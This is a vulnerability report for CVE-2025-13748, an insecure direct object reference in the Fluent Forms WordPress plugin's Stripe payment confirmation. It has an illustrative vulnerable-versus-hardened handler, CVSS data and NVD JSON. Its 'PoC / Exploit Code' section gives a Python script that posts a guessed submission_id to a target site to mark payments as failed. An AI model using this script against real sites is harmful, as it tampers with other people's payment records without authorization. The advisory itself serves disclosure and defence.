Security Vulnerability Report

CVE-2025-13748

Published: 2025-12-06 07:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference (CWE-639) in all versions up to, and including, 6.1.7 via the 'submission_id' parameter, due to missing validation on a user-controlled key within the confirmScaPayment() function of the Stripe inline payment processor. This makes it possible for unauthenticated attackers to mark arbitrary submissions as failed via crafted requests to the endpoint, provided they can guess or enumerate a valid submission identifier. The impact is integrity-only (a payment record can be flipped to failed); no data is disclosed and nothing is made unavailable, which is why the score is a medium 5.3.
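As an added example (not Fluent Forms code and not part of this report), the following Python models the handler shape the description above points at, first in the vulnerable form and then hardened. The Submission class, the in-memory store, the transaction_hash field and the lookup_intent_status() stub are assumptions made for illustration; the plugin's real classes and its Stripe call are not reproduced. What it shows is the two defects an IDOR of this kind bundles together: the record is selected by a client-supplied submission_id alone, and the client also supplies the status that gets written back. Binding the request to a per-submission secret (compared in constant time, with one error for "no such id" and "wrong secret") and taking the outcome from the payment provider rather than from the request closes both.

```python
import hmac
import secrets
from dataclasses import dataclass

# Added illustration, not Fluent Forms code. Submission, the store dict,
# transaction_hash and lookup_intent_status() are hypothetical stand-ins.


@dataclass
class Submission:
    id: int
    payment_status: str        # "pending" | "paid" | "failed"
    transaction_hash: str      # per-submission secret, known only to the payer's browser
    payment_intent: str        # payment-provider intent id (constructed)


# Stand-in for the payment provider's view of each intent (constructed data).
PROVIDER_INTENT_STATUS = {
    "pi_constructed_12345": "succeeded",
    "pi_constructed_12346": "requires_payment_method",
}


def lookup_intent_status(intent_id):
    """Hypothetical provider lookup: the provider, not the client, says whether the charge succeeded."""
    return PROVIDER_INTENT_STATUS.get(intent_id, "unknown")


def build_store():
    """Constructed sample data: sequential ids make enumeration trivial."""
    return {
        sid: Submission(
            id=sid,
            payment_status="pending",
            transaction_hash=secrets.token_hex(16),
            payment_intent=f"pi_constructed_{sid}",
        )
        for sid in (12344, 12345, 12346)
    }


def _parse_id(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def confirm_sca_payment_vulnerable(store, params):
    """Vulnerable shape (CWE-639): the submission is selected purely by the
    client-supplied submission_id, and the client-supplied status is written back.
    Anyone who can guess a valid id can flip that submission's payment state."""
    sub = store.get(_parse_id(params.get("submission_id")))
    if sub is None:
        return 404, "not found"
    sub.payment_status = params.get("status", "failed")
    return 200, sub.payment_status


def confirm_sca_payment_hardened(store, params):
    """Hardened shape: the caller must present the submission's own secret
    (compared in constant time), settled submissions cannot be rewritten, and
    the final status comes from the provider rather than from the request."""
    sub = store.get(_parse_id(params.get("submission_id")))
    presented = str(params.get("transaction_hash", ""))
    # One 403 for both "no such id" and "wrong secret": the check must not
    # become an oracle that tells an enumerating client which ids exist.
    if sub is None or not hmac.compare_digest(
        presented.encode(), sub.transaction_hash.encode()
    ):
        return 403, "forbidden"
    if sub.payment_status != "pending":
        return 409, sub.payment_status
    provider_status = lookup_intent_status(sub.payment_intent)
    sub.payment_status = "paid" if provider_status == "succeeded" else "failed"
    return 200, sub.payment_status


if __name__ == "__main__":
    store = build_store()
    # Guessed id, no secret: the vulnerable handler flips it to "failed"...
    print(confirm_sca_payment_vulnerable(store, {"submission_id": "12345", "status": "failed"}))
    store = build_store()
    # ...while the hardened handler refuses, and only the real secret gets through.
    print(confirm_sca_payment_hardened(store, {"submission_id": "12345", "status": "failed"}))
    token = store[12345].transaction_hash
    print(confirm_sca_payment_hardened(store, {"submission_id": "12345", "transaction_hash": token}))
```

The secret does not have to be a new column: any value the plugin already hands only to the payer at checkout time and stores against the submission will do, as long as it is long, random, and compared with a constant-time function. The 409 on an already-settled submission matters as much as the 403; without it, a caller who does hold the secret could still replay the confirmation later.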

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

NVD lists no CPE configuration data for this entry. The affected product, taken from the description and the patch reference below:

Fluent Forms plugin for WordPress <= 6.1.7 (fixed in 6.1.8; the patched file is app/Modules/Payments/PaymentMethods/Stripe/StripeInlineProcessor.php)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-13748 PoC - Fluent Forms IDOR Vulnerability
# Target: WordPress site with Fluent Forms plugin <= 6.1.7
#
# Caveat: the endpoint and the parameter names below are as given in this PoC;
# they have not been checked against the patched file (StripeInlineProcessor.php
# in the 6.1.8 changeset listed under References). Verify them against the plugin
# source before relying on this script.

TARGET_URL = "https://target-site.com/"
SUBMISSION_ID = "12345"  # Enumerated or guessed submission ID


def exploit_idor():
    """
    Exploit IDOR vulnerability in Fluent Forms Stripe payment processing.
    This allows unauthenticated attackers to mark arbitrary submissions as failed.
    """
    # Construct the vulnerable endpoint
    endpoint = f"{TARGET_URL}?fluentform_payment_confirm=1"

    # Malicious request to mark submission as failed
    payload = {
        'submission_id': SUBMISSION_ID,
        'status': 'failed',
        'action': 'confirmScaPayment',
    }

    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        # A 200 only means the site answered; WordPress returns 200 for almost any
        # front-end request, so confirm the effect in the Fluent Forms entry list
        # rather than trusting the status code.
        if response.status_code == 200:
            print(f"[+] Request sent successfully for submission_id: {SUBMISSION_ID}")
            print(f"[*] Status code: {response.status_code}")
            print(f"[*] Response: {response.text[:200]}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("CVE-2025-13748 - Fluent Forms IDOR PoC")
    print("=" * 50)
    exploit_idor()

References

https://plugins.trac.wordpress.org/changeset/3406804/fluentform/tags/6.1.8/app/Modules/Payments/PaymentMethods/Stripe/StripeInlineProcessor.php (the fix, in the 6.1.8 tag; source: Wordfence)
https://www.wordfence.com/threat-intel/vulnerabilities/id/c2aee799-4e4c-4a41-8b76-e2ad576fe2e2?source=cve (Wordfence advisory; source: Wordfence)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13748",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2025-12-06T07:15:48.220",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.1.7 via the 'submission_id' parameter due to missing validation on a user controlled key within the confirmScaPayment() function. This makes it possible for unauthenticated attackers to mark arbitrary submissions as failed via crafted requests to the endpoint granted they can guess or enumerate a valid submission identifier."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3406804/fluentform/tags/6.1.8/app/Modules/Payments/PaymentMethods/Stripe/StripeInlineProcessor.php",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c2aee799-4e4c-4a41-8b76-e2ad576fe2e2?source=cve",
        "source": "security@wordfence.com"
      }
    ]
  }
}